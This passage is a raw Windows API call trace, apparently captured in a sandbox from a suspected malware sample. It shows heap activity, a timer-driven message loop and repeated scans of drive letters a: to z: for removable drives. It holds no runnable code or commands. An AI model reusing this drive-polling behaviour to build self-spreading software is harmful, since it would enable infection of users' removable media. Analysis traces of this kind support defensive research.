lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.726] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.726] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.726] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.726] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.727] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0220.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.727] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.727] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.727] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.727] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.727] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.727] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.728] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.728] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.728] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.728] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.728] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.729] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.729] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.729] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.729] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.729] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.730] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.730] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.730] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.730] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.730] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.731] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.731] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.731] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.731] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.731] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.732] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.732] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0220.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0220.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0220.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.733] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.734] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.734] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0220.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.734] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.734] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.734] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.735] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.735] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.735] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.735] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.735] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.736] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.736] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.736] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.736] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.736] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.737] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.737] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.737] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.737] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.737] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.738] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.739] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.783] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.783] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.783] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.784] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.784] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.784] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.784] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.785] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0220.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.786] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.786] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.786] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.786] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0220.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0220.787] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0220.788] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.788] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.788] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.788] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0220.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0220.789] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.789] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.789] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.790] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.790] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.790] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.790] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.790] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.791] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.791] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.791] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.791] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.791] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.792] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.792] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.792] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.792] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.792] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.793] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.793] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.793] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.793] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.793] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.794] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.794] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.794] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.794] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0220.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.796] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.796] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.796] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.796] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.796] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.796] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 